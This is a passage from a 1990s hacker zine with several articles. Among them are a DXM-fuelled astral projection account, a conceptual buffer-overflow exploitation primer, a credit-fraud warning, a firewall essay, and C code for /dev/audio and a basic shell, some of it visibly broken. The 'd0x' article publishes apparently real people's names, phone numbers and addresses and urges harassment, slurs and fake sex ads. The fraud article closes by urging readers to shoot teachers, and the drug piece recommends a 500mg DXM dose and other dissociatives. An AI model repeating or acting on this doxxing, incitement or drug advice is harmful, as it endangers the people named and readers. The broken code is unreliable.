  692.       This method may not work everyone, and is just my
  693.       personal way of inducing OOBE.
  694.  
  695.     You may or may have not heard about people leaving there physical
  696. bodies and projecting thereselves into a higher dimension, known as the
  697. astral plain. Beleive it or not, this strange act of phenomina is
  698. totally real, and many people today practice methods that will eventually
  699. lead them to disociating themselves from there physical bodies. It is
  700. said by some that the whole sensation of leaving your body and exploring
  701. the astral plain is a state of mind. That is definatley not true. I 
  702. myself, and many others have done experimentation. When you get up and
  703. step out of your body you are seeing what is going on in the world just
  704. as you would see it if you were in your physical body. You are just seeing
  705. it from the perspective of a different dimension. The 4th dimension.
  706.  
  707.     
  708.     3/12/99 - I ingested 500mg of dxm(Dextramethorphan helps induce OOBE)
  709. After the effects started coming on, I lay down in my bed. After about
  710. 15 minutes of rythmic breathing, my body was totally relaxed. I lay there
  711. with a clear mind. My body starts viberating after about another 5 minutes.
  712. After feeling like my chest was being crushed by some massive force I got
  713. a tingling sensation and I could see through my eye lids. From there, I 
  714. laid a moment then lifted my arms slowly until I felt them slide out of
  715. my physical body. I satup and staired at my lifeless looking body. And I
  716. realized, my body is not me, it is just a shell for my soul. With that in
  717. mind I decided that I wanted to fly to seattle for no particular reason.
  718.  
  719.     After patrolling the streets of seattle where I once lived, I felt
  720. an urge to get back to my body but wanted to stop at my ex girlfriends 
  721. house first. I sort of bounced my way up to her house by gliding through
  722. the air. I went into her room, where we previously used to sit and smoke
  723. pot. I saw a figure sitting in the desk chair with its back towards me.
  724. It slowly turned around, and it was rather a grotesque looking boy with a
  725. sort of transparent image. When he smiled, I realized that I had seen him
  726. before at my house in seattle when I woke up one night after a horrifying
  727. dream. I quickly flew back to my body, through blurs of colors and over
  728. trees and buildings. As I laid in my body, I felt like I couldnt get back
  729. in alignment. I started to get sorta freaked out but after a few minutes
  730. of struggling I managed to regain contact with my physical parts.
  731.  
  732. True story? Of course.
  733.  
  734. If you would like to try something like this, I am giving you my personal
  735. method in having out of body experiences. Expect this to take some practice
  736. and time. If you are willing to take dxm to help induce an OOBE, then great.
  737. It makes it 10 times easier. 
  738.  
  739. First lay down, on the floor or on your bed. Your head and feet should
  740. be even. Meaning you shouldnt be laying on a pillow or anything. Next
  741. with your hands at your sides, start out with rythmic breathing. Like so:
  742.  
  743. Breath in for 2 seconds      The whole time you are doing this rythmic
  744. Breath out for 4 seconds    breathing, you should be letting yourself
  745. Breath in for 2 seconds       get totally relaxed. Don't worry about 
  746. Breath out for 4 seconds      dozing off or entering a sleep state,
  747. Breath in for 2 seconds       because that in itself could help you
  748. Breath out for 4 seconds      leave your body. One of the main theories
  749. Breath in for 3 seconds       behind astral projection is that you are
  750. Breath out for 6 seconds      in a sleeping state while still being 
  751. Breath in for 3 seconds       in a conscious type state of mind.
  752. Breath out for 6 seconds    On one occasion, I felt that I had fallen
  753. Breath in for 3 seconds       asleep. Then I woke up, and stood up out 
  754. Breath out for 6 seconds      of bed. A second later I realized it was
  755. Breath in for 4 seconds       a totally false awakening because I saw my
  756. Breath out for 8 seconds      physical body laying there on my bed limp
  757. Breath in for 4 seconds       and breathing. Another thing, as you are
  758. Breath out for 8 seconds      doing this try to maybe breathe in a way 
  759. Breath in for 4 seconds       that you are breathing in correspondance
  760. Breath out for 8 seconds      to your hearts rythm. For example, you
  761.                           feel your heart beat, then you breathe in
  762.                   for two seconds, you hear it beat again, then
  763.                   you breathe out for four seconds. Just experiment
  764.                   with it, and find your own technique in getting
  765.                       really relaxed.
  766.  
  767. Repeat this method until every
  768. muscle in your body is relaxed to its fullest.
  769.  
  770. After this, try to have a totally clear mind. Think about absolutely 
  771. nothing. Concentrate only on your feet until they start to feel like
  772. they are floating. Move up to your hips and concentrate in the same
  773. manner. By now, you should start feeling powerful viberations throughout
  774. your body, like your being electricuted. You may even feel pain. But
  775. that is one of the things you will have to learn, trust that you will be
  776. ok. Don't back down, it is all a state of mind. After much viberations 
  777. you may be able to see through your eye lids. This means you have 
  778. succeeded. From here, picture yourself rising out of your body. 
  779. And you may just find yourself sitting up and exiting your physical shell.
  780.  
  781.     You may say "What a huge crock of shit, leaving your body could not 
  782. possibly be so easy." Yes, this method is fairly simple, but it takes much
  783. practice for your average person. It personally took myself several months
  784. to start getting anywhere in the experience after I reached the viberations.
  785. But after you get your first OOBE, there are many more to come. If you
  786. want to experience an OOBE possibly your first try, as I said before..
  787. disociatives, like kentamine, pcp help induce them. But most noteably
  788. dxm (dextramethorphan). Check out http://www.frognet.net/~dxm for the
  789. dxm FAQ, or http://www.alaska.net/~zorak/dxm if you would like the download
  790. an issue of the dxm magazine. 
  791.  
  792. Conclusion, 
  793.     Hopefully this article gave you a little bit of insight as to what
  794. astral projection is all about. If you would like to furthur your knowledge
  795. in the area, search for "OOBE", "astral projection" etc. On a search engine.
  796. Or go to the library and check out a book on the subject. eg. 
  797. "Leave your body in 21 days". Also http://www.winternet.com/~rsp/obebook.html
  798. is a good book by Robert Peterson on how to have OOBE, and its online
  799. in HTML! I hope you enjoyed the article =)
  800.  
  801. ph1x@b4b0.org
  802.  
  803.  
  804.  
  805. --------------------------------------------------------------------------------
  806.    <b4b0!b4b0!b4b0!> Womper Language Interpretor, by chrak <b4b0!b4b0!b4b0!>
  807. --------------------------------------------------------------------------------
  808.  
  809.  This is a neat language interepor by chrak, that is still in developement.
  810.  Check out /w0mper, and make sure to read Example.sh to see a set of example
  811.  code.
  812.  
  813. * NOTE * this isn't quite finished and hopefully chrak will come through
  814. with more releases. Thank you.
  815.  
  816.  
  817. ----------------------------------------------------------------------------------------
  818. <b4b0!b4b0!b4b0!b4b0!> Buffer overflow exploitation, by ph1x <b4b0!b4b0!b4b0!b4b0!b4b0!>
  819. ----------------------------------------------------------------------------------------
  820.  
  821. Buffer overflow exploitation.
  822.  
  823. NOTE: This article does not explain how to write buffer overflows,
  824.       but rather explains how they are taken advantage of.
  825.  
  826. Ok, there have already been several articles released on buffer overflows
  827. and how they are taken advantage of. I talk to people on IRC every day
  828. who claim to have skillz, yet beleive it or not many of them do not have
  829. the slightest idea as to what a buffer overflow is, how they work, and
  830. how they are exploited. I'm going to give a brief introduction to them
  831. in this article, and im hoping that you will have a much better
  832. understanding of buffer overflows after going over this. I have a feeling
  833. that many people find aleph1's article to complex to understand, so I will
  834. try to put the concept of buffer overflows into your head with basic idea's.
  835.  
  836.  __________________________
  837. |What is a buffer overflow?|
  838.  
  839. A buffer overflow is just what it sounds like. Merely overflowing a buffer,
  840. with more data than it can hold. In doing so, you can change the execution
  841. of instruction by overwriting the return address on the stack.
  842.  
  843. The stack is a type of data that is brought up by the ss(stack segment)
  844. register when a program is called to be executed. It is what the programs
  845. execution is based on. It has several functions, but the two important
  846. ones that we need to know, are PUSH and POP. PUSH adds data to the top
  847. of the stack, like instruction code. POP then removes the last piece of
  848. data on the stack, making it smaller. There is also an important register
  849. called the SP register (Stack Pointer), which points to the address of
  850. whatever is at the very top of the stack. This actually varies, depending
  851. on the processor. For example, intel and sparcs, the stack moves in a 
  852. downward direction towards lower addresses. So the sp points to the top
  853. of the stack where new instruction is being placed. On other implementations
  854. the stack may move up, so the sp points to the bottom of the stack. In
  855. addition to the stack pointer, there is another register that is commonly
  856. reffered to as FP(Frame pointer). Which points to a frame on the stack.
  857. The distance from the SP(At the top of the stack), and FP(in one of the 
  858. stack frames) are subtracted to find the address of local variables and
  859. access them. The return address is in charge of executing instruction
  860. as the addresses are moved down the stack. With all of this in mind, 
  861. lets take a look at a simple example and see how the stack might look.
  862.  
  863. --------------------------example1.c----------------------------------------
  864.  
  865. #include <stdio.h>
  866.  
  867. void integer(int x, y) {
  868.  
  869. char bleh[10];
  870. }
  871.  
  872. void main(void) {
  873. integer(1,2);
  874. }
  875.  
  876. ----------------------------------------------------------------------------
  877.  
  878. The stack would look like this.
  879.  
  880.  
  881. [     bleh    ] [  FP  ] [ RET ] [  X  ] [  Y  ] 
  882.  
  883. Top of the stack              Bottom of the stack
  884.  
  885.  
  886. How in the hell does all this fit together???
  887.  
  888. Well, lets look at one more example.
  889.  
  890. --------------------------example2.c----------------------------------------
  891.  
  892. #include <stdio.h>
  893.  
  894. void main(void){
  895.  
  896. char string[100];
  897. int i;
  898.  
  899. for(i=0;i<99;i++) {
  900. string[i] = 'A';
  901. }
  902.   overflow_dat_shiat(string);
  903. }
  904.  
  905. overflow_dat_shiat(char *big_string) {
  906.  
  907. char buffer[32];
  908.  
  909. strcpy(buffer, big_string);
  910.  
  911. }
  912. -----------------------------------------------------------------------------
  913.  
  914. This code has an error. It uses strcpy() which supplies no bounds checking
  915. and copies 100 bytes of 'A' chars, into a buffer that is only 32 bytes.
  916. Therefore, everything on the stack after the 32 byte buffer is being over
  917. written with A's hex value which is 0x41. When this program is ran, it
  918. returns a segementation violation. Why? Because instead of the next set
  919. of instruction for the return address to execute being pushed down to
  920. ret(return address) it was mostly all overwritten with the continuous
  921. hex value of 0x41. Like 0x41414141. So when it tries executing the set
  922. of instruction assigned to 0x414141 it seg faults.
  923.  
  924. Understanding this, think what would happen if we could get the return
  925. address to execute instructions assigned to a VALID address, maybe
  926. an address that holds code. Code that spawns a shell. We could gain
  927. root if the program were overflowing is +s.
  928.  
  929. To not get very complex, im going to finish this article with a clean
  930. easy to understand example as to how we can accomplish doing this.
  931.  
  932. We would want to fill the buffer we are overflowing with code that
  933. spawns a root shell, followed by the address of where the buffer 
  934. we are overflowing starts. Take a look. 'X' stands for the code
  935. that executes a shell and will say that "0xF4" is the address
  936. of where the buffer begins.
  937.  
  938.      Buffer    FP   RET
  939.    [XXXXXXXX][XXXX][0xF4] <--- Filled the buffer and FP with shell
  940.                      instruction followed by the address
  941.                       of where the shell instruction begins.
  942.                      So RET(return address) is going to execute
  943.                       the instruction that is assigned to 0xF4
  944.                      which happens to be code that spawns a
  945.                      shell. 
  946.  
  947.  Many times we have trouble finding the exact address to where the
  948.  buffer begins. So we can just fuck with the address a little bit.
  949.  Of course your chances wont be very good at guessing, but there is
  950.  something called "Padding" that we can do. We fill about half of
  951.  the buffer with something called NOP instruction. And if the return
  952.  address executes an address that happens to land anywhere in the 
  953.  NOP instruction, the NOPS will just keep executing until they reach
  954.  are shell code. For our last example, our NOP code stands for 'Y'
  955.  and shell code still stands for 'X'. Lets say we dont know that
  956.  the start of buffer starts at 0xF4, but were going to assume that
  957.  it starts at 0xF6.
  958.     
  959.    Buffer    FP   RET
  960.  [YYYYYYXX][XXXX][0xF6] <--- This would land at the second piece of    
  961.                      our NOP instruction. And although, we 
  962.                     dont have an exact address of where our
  963.                      shell code starts, are NOP instruction 
  964.                        is going to execute all the way until
  965.                            it reaches our shell code. The shell
  966.                      code then continues being executed.    
  967.                      Then poof!@#$ A shell is spawned.
  968.  
  969.  
  970. What happens if the buffer we want to overflow happens to be
  971. too small for the shell code to fit in? Well, in most cases
  972. you have access to the environment variables on the stack.
  973. With this in mind, we can stuff the shell code in a one of
  974. the variables, and overflow the buffer with the address
  975. of the variable holding our shell instruction.
  976.  
  977. How might I go about auditing source code to find buffer overflow errors?
  978. Well in our example, we used the function strcpy(). But there are several
  979. functions that do not do boundary checking. strcpy(), strcat(), sprintf(),
  980. and vsprintf(). gets() is also a problem. Unlike the 4 functions above
  981. which are based on NULL for string termination, gets() reads a line from
  982. stdin into a buffer, until a newline or an EOF. Also, the while() loop
  983. does not check for character overflows.  A loop that fills a buffer with
  984. per`se 'A' a specific number of times. So when auditing source, keep your
  985. eye out for these particular functions, and in many cases you will find a
  986. buffer overflow error. Good luck =) 
  987.  
  988.  
  989.  
  990. Conclusion:
  991.  
  992.     Hopefully after readin this, you have a better understanding as
  993.     to how buffer overflows work and how they are exploited. If so
  994.     you might feel comftorable with reading a more in detail and
  995.     comprehensive article such as "Smashing the stack for fun and profit"
  996.     by Aleph. 
  997.                   Hope you enjoyed this article.
  998. ph1x@b4b0.org
  999.  
  1000.  
  1001. -------------------------------------------------------------------------------------------
  1002. <b4b0!b4b0!b4b0!b4b0!> The stupidity that lies in credit fraud, KKR <!b4b0!b4b0!b4b0!b4b0!>
  1003. -------------------------------------------------------------------------------------------
  1004.  
  1005.     I would first like to start by stating the intent of this article. I
  1006. have seen far too many of my friends busted for credit card fraud lately.
  1007. Its probably one of the dumbest things you can do with your computer skills.
  1008. Sure, its probably profitable to card tons of hardware and sell it off at
  1009. half the price and make a bundle. Easy money right? Well, you wont be 
  1010. laughing when you're in jail and owe thousands of dollars to the goverment
  1011. for credit card fraud. Now dont get me wrong, if you really want to get busted
  1012. then go ahead, this is definatley the way to go. Its probably one of the 
  1013. easiest ways. There is almost a 100% chance that you will be caught and
  1014. arrested, no matter what type of precautions you take. If you get caught
  1015. arrested and convicted for credit fraud, the consequences can be extremely
  1016. brutal. No matter what age you are, you will almost definatley be tried as
  1017. an adult. If convicted, you will never be able to get any type of goverment
  1018. job. This doesnt just include the FBI or other high level jobs, but you
  1019. wouldnt even be able to qualify for a janitor in a public school, or a
  1020. bus driver on a city bus. "Oh," you say, "Well, im really safe about carding
  1021. , I use wingates and proxies, and I never order stuff to my house. Theres
  1022. no way they can catch me." Wrong. The feds have complicated ways of catching
  1023. carders, and trust me, its very hard not to get caught. First of all, proxy
  1024. servers and the like can be unsafe. Many times they log all connections, so
  1025. the federal agencies have only to call the owners of the machine, and 
  1026. request the logs for a certain time. A request which they will most usually
  1027. comply with. Ever hear of the kids who broke into the pentagon? They used
  1028. all sorts of proxies and shit, and what happened to them? They got their
  1029. asses caught. Drop email addresses for reply emails from the company you're
  1030. carding from can get you caught as well. Places like hotmail and yahoo 
  1031. usually log the host you're using to get your mail, so that's not safe
  1032. either. You like bragging about your carding on IRC? Federal agents 
  1033. frequent irc carding channels so I'd stay away from them. You think its 
  1034. safe to card stuff to an empty house? Federal agents can place a small
  1035. packet of material that can easily be tracked by trained dogs in the
  1036. package if they are investigating you for carding, so if you bring the
  1037. merchendise home, your screwed. If you're carding now, stop. If you're
  1038. thinking about doing it, think again. I have a much better and more 
  1039. rewarding idea. Bring a shotgun to school and blast a few teachers, you 
  1040. have a pretty good chance of getting away with it.
  1041.  
  1042. Kaptain Kangaroo
  1043.  
  1044.  
  1045.  
  1046.  
  1047. ----------------------------------------------------------------------------------------
  1048. <!b4b0!b4b0!b4b0!b4b0!> Screwing around with /dev/audio, by ph1x <!b4b0!b4b0!b4b0!b4b0!>
  1049. ----------------------------------------------------------------------------------------
  1050.  
  1051.      
  1052.     In unix, all of your devices are reffered to as "special files".
  1053. I have heard several people asking about /dev/audio, and how to access it
  1054. and take advantage of it etc. I decided to write an article on it.
  1055. Below are some functions that I wrote that you can use to read and write
  1056. from /dev/audio. Enjoy =)
  1057.  
  1058.  
  1059. -------------------------------funct10nZ-------------------------------------
  1060.  
  1061. #include <stdio.h>
  1062. #include <errno.h>
  1063. #include <fcntl.h>
  1064. #include <stropts.h>
  1065. #include <unistd.h>
  1066.  
  1067. #define DEVICE "/dev/audio" /*duh*/
  1068.  
  1069. int fd = -1; /* this is our audio device file descriptor */
  1070.  
  1071. /* int open_sound(void) {
  1072.    while(((fd = open(DEVICE, 0_RDWR)) == -1) &&
  1073.         (errno == EINTR)) 
  1074.            ;
  1075.    if(fd <= 0)
  1076.       return -1;
  1077.       return 0;
  1078.   }
  1079.  
  1080. void close_sound(void) /* this closes /dev/audio */ 
  1081. {
  1082.  close(fd);
  1083.  fd = -1;
  1084. }
  1085.  
  1086. /* this reads up to maxb bytes from /dev/audio */
  1087. int read_sound(char *buff, int maxb)
  1088. {
  1089.   ssize_t bytes;
  1090.  
  1091.   while (((bytes = read(fd, buff, (size_t)max)) == -1) &&
  1092.         (errno == EINTR))
  1093.            ;
  1094.          return(int)bytes;
  1095.     }
  1096.        
  1097. int write_sound(char *buffer, int size)
  1098. {
  1099.   ssize_t written; // bytes written
  1100.    size_t tried;   // bytes tried
  1101.    char *buffl;
  1102.    
  1103.    buffl = buffer;
  1104.    tried = size;
  1105.    
  1106.    while(tried != 0) {
  1107.    if((written = write(fd, buffl, tried)) >= 0) {
  1108.    tried -= written;
  1109.    buffl += written; }
  1110.    else if(errno != EINTR)
  1111.    break;
  1112.  }
  1113.   if(written == -1)
  1114.     return written;
  1115.    else
  1116.    return size;
  1117. }
  1118. -------------------------------------------------------------------------------
  1119.  So the following function prototypes should be in like bleh.h like so..
  1120.  
  1121. int open_sound(void);
  1122. void close_sound(void);
  1123. int read_sound(char *buff, int maxb);
  1124. int write_sound(char *buffer, int size);
  1125. -----------------------------------------
  1126.  
  1127. Lets write a little proggy that reads from the microphone now.
  1128.  
  1129. --------------------------------microphone.c------------------------------------
  1130.  
  1131. #include <stdio.h>
  1132. #include <stdlib.h>
  1133. #include <stropts.h>
  1134. #include <fcntl.h>
  1135. #include <errno.h>
  1136. #include "bleh.h"
  1137.  
  1138. #define BUF 1024
  1139.  
  1140. void main(void) {
  1141.  
  1142.  char buffer[BUF];
  1143.  int read;
  1144.  
  1145.  open_sound();
  1146.  printf("Speak into your microphone now, HEH!@#$\n");
  1147.  
  1148.  while(1) {
  1149.  if((read = read_sound(buffer, BUF)) == -1) {
  1150.     fprintf(stderr, "Could not read microphone\n");
  1151.     break;
  1152.  } else if( write_sound(buffer, read) == -1) {
  1153.     fprintf(stderr, "Could not write to speakers\n");
  1154.     break;
  1155.   }
  1156.  }
  1157.   close_sound();
  1158.   exit(0);
  1159. }
  1160. ----------------------------------------------------------------------------------------
  1161.  
  1162. Pretty cool huh? We had a chance to use all of my functions in this
  1163. program. Unfortunatley I didnt have alot of time to extend any furthur
  1164. on this article. Sorry. Enjoy =)
  1165.  
  1166. ph1x@b4b0.org
  1167.  
  1168.  
  1169. ----------------------------------------------------------------------------------------
  1170. <b4b0!b4b0!b4b0!b4b0!> My day in age, by rhinestone cowboy <!b4b0!b4b0!b4b0!b4b0!b4b0!>
  1171. ----------------------------------------------------------------------------------------
  1172.  
  1173.     I had an epiphany the other day. It wasn't the kind of flash of 
  1174. insight that makes you shave your head, move to the desert, and change
  1175. your name to something that sounds like an astronomical phenomena, but
  1176. I do think it's something that other people need to hear. You see, I
  1177. am a professional consultant, and with this project, I became a man.
  1178.  
  1179. I was tasked with building a firewall for a healthcare facility. This
  1180. wasn't very difficult, and, apart from the planning phases and alot of
  1181. mostly useless meetings, it got built in a day or two. All the exceptions
  1182. were put in place, and the LAN was protected to a dgree to which it
  1183. had never been protected before. All was right with the world...
  1184.   ... Until the client got involved. It started with a simple request.
  1185.  
  1186. "Could you please open up telnet services in the firewall to this one
  1187. particular Solaris box? We have a few outside consultants who need to 
  1188. get into that box so they can work remotley. In particular, we have a
  1189. user from an educational facility who needs remote root access."
  1190.  
  1191.     I objected, of course, but I was then informed that it was the
  1192. opinion of the IS staff, that this was an "acceptable risk." This wasn't
  1193. an opinion that could be justified by anyone, especially after they 
  1194. shelled out countless thousands of dollars on a "network security solution".
  1195.  
  1196.     It got a little worse, of course. About a week later, I uncovered a
  1197. bug in there web front end to their database. Instead of praise, I got
  1198. what I should have expected, exchanges like the following:
  1199.  
  1200. "Only people who subscribe to this database should have access. Now you
  1201. are telling me that ANYONE on the net can get this data for free? What
  1202. the hell is that firewall doing?"
  1203.  
  1204. "The firewall is doing it's job. The problem is that your web app. Never
  1205. asked me for anything like a password. It just gave me access. It
  1206. really wasn't complicated at all. A fireall simply cannot fix your buggy
  1207. software.
  1208.  
  1209. "Firewalls make computers secure. This computer isn't secure. Obviously,
  1210. the fireall you made, doesnt work."
  1211.  
  1212.     He just didn't get it. I would have been more then happy to spend the
  1213. time to audit all the machines individually, apply the proper patches, 
  1214. and fix any configuration errors that may rear their ugly heads, if the
  1215. client was willing to pay for my time. Hell, i'd even work hard!
  1216. Unfortunatley, the client didn't want to hear that. He wanted his "magic
  1217. bullet, " and if I wasnt willing to provide it, he'd hire another consulting
  1218. company to do it.
  1219.  
  1220.     It then occurred to me, that this senario is being played out all 
  1221. over the net, and it's alot bigger then I had previously realized. I was
  1222. playing a part, so was the IS director, so was my company, and so was the
  1223. firewall.
  1224.  
  1225.     Corporate America is all about "covering your ass." No one wants
  1226. accountability for anything. If bullshit and 'passing the buck' were the
  1227. keys to world domination, the USA would be the world's only super power.
  1228.  
  1229. Wait, never mind...
  1230.  
  1231.     Anyway, this is what hit me. Firewalls do alot more then filter
  1232. packets and give IS gimps a warm fuzzy feeling when they go home at night.
  1233. Firewalls manage to almost universally remove any traces of accountability 
  1234. in corporate security. As in the above example, if, I mean when, someone 
  1235. sniffs the root password and usese it to compromise the LAN, the IS depart-
  1236. ment can pretend that they weren't at fault. They can pass the buck to me
  1237. or my company. Fortunatley, there is a contract protecting us from lawsuits
  1238. of that nature. If necessary, the buck can even be passed, either by my 
  1239. company or the clients, to the vendor. Even they can pass the buck, since
  1240. any rational person would realize that they weren't involved in this 
  1241. morass.
  1242.  
  1243.      The myth of the "fireawall as a magic bullet" is some of the most
  1244. useful bullshit ever spun. It allows everyone to sleep easier at night
  1245. and make alot of money. Of course, the buck ultimately stops getting
  1246. passed by another piece of bullshit, the myth of "the genius hacker." I'm
  1247. not saying that there aren't some genuinely brilliant people breaking into
  1248. computers these days, but chances are they aren't relying on a 5 year old
  1249. sniffer running on a SunOS 4.1.3 box in an .edu site, which is silly 
  1250. enough to have a guessable NIS mapname.
  1251.  
  1252.     The world is very broken. We have security products that either 
  1253. simply don't work, don't work up to the impossible expectations put on them
  1254. , or even introduce furthur holes in hosts and networks they are suppose
  1255. to be protecting. We also have a world of corperate IS managers, mostly 
  1256. incompetent "security consultants", and talentless bullshit artists
  1257. who manage to social engineer their way into six figure incomes because
  1258. they are "reformed hackers."
  1259.  
  1260.     It would be nice if some kind of messiah of the computer age were to
  1261. come along and make it all better. Unfortunately, that's not going to 
  1262. happen. If there was such a person, we'd either nail him to a cross or he
  1263. would opt for the huge paycheck which comes with playing a part in the
  1264. system. I suspect I have finally entered into adult life, because I have
  1265. little or no desire to change an awfuld system that I can not fix. There
  1266. are quite a bit of rewards for being as corrupt as everyone else. So here
  1267. is the choice facing us all, either sit down at the table of corruption
  1268. and shared guilt and get paid alot (basically sell out) or fight a
  1269. hopeless battle against American corporate culture. I think adulthood is
  1270. really choosing to play in the "bullshit playground" with the rest of
  1271. the grownups. Today, I am a man.
  1272.  
  1273. Rhinestone Cowboy
  1274.  
  1275.  
  1276. --------------------------------------------------------------------------------
  1277. <!b4b0!b4b0!b4b0!b4b0!> d0x (For your harrasing enjoyment) by pG <!b4b0!b4b0!b4b0!b4b0!>
  1278. --------------------------------------------------------------------------------
  1279.  
  1280. hey kids! it's yer friendly neighborhood nazi death metal anarchist, 
  1281. racist, fucked up, mentally disturbed, cracked up, dopehead, abortion 
  1282. supportin, nigger lovin, grave desecrating, dj sporting, rave killing, 
  1283. teacher hating, school burning, car alarm setting, payphone breaking, 
  1284. road sign tagging, unethical hacking motherfucker, plastik gezus.
  1285.  
  1286. and guess what i got for you people today...that's right people, i've 
  1287. got a fresh little hax0r kiddie. you all know them, and love to 
  1288. fuck with them. and since i seem to be like a lamer magnet since 
  1289. my name gets posted on every "leet-0 hax0r" site on the 
  1290. internet, i thought i'd share this one special kid with you.
  1291.  
  1292. the first thing a pipe-dream hacker needs is a leet handle, as for this 
  1293. kid, his name is "datasyn." oh wait i'm sorry... "dAtasYn." 
  1294. my bad... however, that's obviously not his real name. for the sake 
  1295. of this article we're going to call him... oh.... Mike Feltenberger.
  1296.  
  1297. now you may ask yourself what the point of having a el8 hax0r of
  1298. your own is. well.. these people can be very fun. for example: say 
  1299. you're bored and you and your friends are sitting around thinking 
  1300. of something to do. you've got a phone. well, you could prank call 
  1301. him. all you would need is a number, like.. say.. 724/588-8963 or 
  1302. maybe 724/588-9138.
  1303.  
  1304. now you're set! see how much fun that is?
  1305.  
  1306. or you could shut off his phones all together, all you need is an address 
  1307. (like 80 Clarksville Street; Greenville, PA) and a tiny bit of skill 
  1308. and you're all set, my friend.
  1309.  
  1310. now i know what you're saying:
  1311. "sure this is fun for a few months, but what happens when i get bored 
  1312. with making his life crap?" well, then you can move on to his 
  1313. friends. losers always have some homosexual friends. in this case 
  1314. it would be a little hax0r group called the Hax0rz MatrickZ.
  1315.  
  1316. but you say, "well i'm really lame, and i can't get d0x as elite 
  1317. as you pG, will you help me?"
  1318.  
  1319. why of course, friend!
  1320.  
  1321. the owner of this wonderfuly leet-0 hax0r gr0up is none other than the
  1322. never-heard-of-before-because-has-never-done-anything 
  1323. nEoGoD. let's call him... say... Josh Hanselman.
  1324.  
  1325. "but pG, what do i do with just his name?"
  1326.  
  1327. easy, let's pretend you didn't have enough skill to get his phone number (which
  1328. is 724/646-1599 
  1329. btw). you could still get his address using directory services and 
  1330. post sex ads on yahoo.com. hours of family fun!
  1331.  
  1332. "ok pG, but can't i make random calls to other people he knows and start talking 
  1333. shit about him?"
  1334.  
  1335. why of course! now you're thinkin.. you could 
  1336. get the numbers of his friends too if you were el8 enough. (like 
  1337. say.. 724/646-0465, 724/475-2294, and 724/253-2750)
  1338.  
  1339. see how much fun this is?
  1340.  
  1341. "yeah it is, but what about his girlfriends?"
  1342.  
  1343. oh that's easy, Erin.. i mean, whoever it may be, can be called and 
  1344. harassed just as well. like say her phone number was 724/588-0817, 
  1345. you could call up and say "hey Erin (or whatever her name is), 
  1346. you sissy cunt, are you ready for my dick bitch?"
  1347.  
  1348. "what happens when 5000 people start calling them?"
  1349.  
  1350. well, let's say your victim was called vyle-t0ne (724/342-2768)  and he
  1351. thought he was a leet hax0r, well he would quickly be put in his place and
  1352. probably leave the internet in fear.well that's all for now kids. have
  1353. fun.  and yes, this WAS boring to write just as it was boring to read.  so
  1354. fuck off kid!  my ass is bleeding, bye. 
  1355.  
  1356. Your friend, Plastic Gezus
  1357.  
  1358. *************[BONUS DOX!@#$]************
  1359.  Coolio: Joseph fillmore 1314 
  1360.   Comstock St. San Diego, CA 92111  
  1361.   Phone: 619-268-8330
  1362. -----------------------------------
  1363.   overdose aka Shawn : 517-262-2199
  1364.   1-800-800-8689, pin # 80008310
  1365.   54 (alpha op dispatch) 313-238-2660 (numeric/voicemail)
  1366. ---------------------------------------------------------
  1367.   Digitalx: (604)951-1191
  1368. *****************************************
  1369.  
  1370. PS. Dox dropping is lame, but for these 3 gimps, we made
  1371. an special exception.
  1372.  
  1373.  
  1374. --------------------------------------------------------------------------------
  1375. <b4b0!b4b0!b4b0!> Coding a shell from the ground up, ph1x <b4b0!b4b0!b4b0!>
  1376. --------------------------------------------------------------------------------
  1377.  
  1378. This article I am going to discuss what a shell is, how a shell works
  1379. and were going to build a shell from the ground up.
  1380.  
  1381. For all source were going to be writing today, we will need b4b0shell.h
  1382. included below.     
  1383.     
  1384.      Lets get started. A shell is a program that does command 
  1385. interpretation. A shell can also be reffered to as a command processor,
  1386. as most DOS users know. It reads input, then executes the command.
  1387. The execution of a command, is basically creating a child process for
  1388. the execution. For example, the shell will fork() a child process to
  1389. execute the command. The parent(the shell) will then wait for its child
  1390. to finish before it reads another command. Before we start coding, make
  1391. sure your using the following header file in all of your codez..
  1392.  
  1393. /**********************************/
  1394. /* Header file for the b4b0 shell */
  1395. /* Extrapolated from ush.h, and   */
  1396. /* added onto. ph1x@b4b0.org      */
  1397. /**********************************/
  1398. /*
  1399.    NOTE: We wont be making use of this whole header file today
  1400.          our shell is not going to have the complexity of your
  1401.          standard unix shell that you use from a daily to daily
  1402. */       basis. 
  1403.  
  1404. #include <string.h>
  1405. #include <sys/types.h>
  1406. #include <sys/stat.h>
  1407. #include <fcntl.h>
  1408. #include <unistd.h>
  1409. #include <stdlib.h>
  1410. #include <stdio.h>
  1411. #include <sys/wait.h>
  1412. #include <limits.h>
  1413.  
  1414. #define STDMODE 0600
  1415. #define DELIMITERSET " ><|&" // we are only going to add redirection to
  1416.                      // our shell, not background or pipe support
  1417.  
  1418. #ifndef MAX_CANON
  1419. #define MAX_CANON 256
  1420. #endif
  1421. #define TRUE 1
  1422. #define FALSE 0
  1423. #define BLANK_STRING " "
  1424. #define PROMPT_STRING "b4b0$" 
  1425. #define QUIT_STRING "quit"
  1426. #define BACK_STRING "&"     // for background process
  1427. #define PIPE_STRING "|"     // pipe support
  1428. #define NEWLINE_STRING "\n"
  1429. #define IN_REDIRECT_SYMBOL '<'  //redirection 
  1430. #define OUT_REDIRECT_SYMBOL '>' // symbols
  1431. #define NULL_SYMBOL '\0'
  1432. #define PIPE_SYMBOL '|'         
  1433. #define BACK_SYMBOL '&'        
  1434. #define NEWLINE_SYMBOL '\n'
  1435.  
  1436. int makeargv(char *s, char *delimiters, char ***argvp);
  1437. int parsefile(char *inbuf, char delimiter, char **v); // this will return
  1438. // the token following delimiter if its present in *s.
  1439. int redirect(char *infilename, char *outfilename); // performs redirection
  1440. int connectpipeline(char *cmd, int frontfd[], int backfd[]);
  1441.  
  1442. /*************************-=EOF=-******************************/
  1443.  
  1444.  
  1445. First we will write an extremely basic command interpreter,
  1446. just for you to get a basic idea as to how a shell calls
  1447. a child process to execute commands, and for you to experiment
  1448. with.
  1449.  
  1450. ---------------------------bsh v1.0-----------------------------------
  1451.  
  1452. #include "b4b0shell.h"
  1453. #define MAX_BUF 500
  1454.  
  1455. void main(void) {
  1456.  
  1457.   char input[MAX_BUF];
  1458.   char **rargv;
  1459.  
  1460.   while(1) {
  1461.       fprintf(stderr, "%s\n" PROMPT_STRING);
  1462.       fgets(input, MAX_BUF, stdin);
  1463.       if(strcmp(input, QUIT_STRING) == 0)
  1464.           break;
  1465.        else {
  1466.           if( fork() == 0) {
  1467.               if(makeargv(input, BLANK_STRING, &rargv) > 0)
  1468.           execvp(rargv[0], rargv);
  1469.           }
  1470.           wait(NULL)
  1471.         }
  1472.       }
  1473.       exit(0);
  1474. }
  1475.  
  1476. --------------------------------EOF-----------------------------------------
  1477.  
